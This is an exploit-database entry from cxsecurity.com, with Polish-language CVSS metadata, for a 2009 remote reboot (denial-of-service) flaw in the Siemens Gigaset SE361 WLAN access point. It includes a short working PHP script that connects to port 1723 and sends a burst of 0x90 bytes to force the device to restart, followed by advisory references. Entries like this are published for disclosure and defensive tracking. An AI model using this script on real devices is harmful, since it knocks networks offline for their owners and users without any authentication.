Siemens Gigaset SE361 Wlan - Remote Reboot

2009-09-23 / 2009-09-24
Credit: crashbrz
Risk: High
Local: No
Remote: Yes
CWE: CWE-noinfo


Ogólna skala CVSS: 7.8/10
Znaczenie: 6.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Pełny

Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP. It takes a few bytes for the AP to automatically restart <?php $apaddr = "192.168.2.1"; $apport="1723"; $con = fsockopen($apaddr, $apport, $errno, $errstr); if (!$con) { echo "$errstr ($errno)<br />\n"; } else { $trash = str_repeat("\x90","261"); fwrite($con, $trash); while (!feof($con)) { echo "$trash \r\n"; } fclose($con); } ?>

Referencje:

http://www.securityfocus.com/bid/36366
http://www.securityfocus.com/archive/1/archive/1/506414/100/0/threaded
http://www.osvdb.org/58199
http://www.milw0rm.com/exploits/9646
http://secunia.com/advisories/36697


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top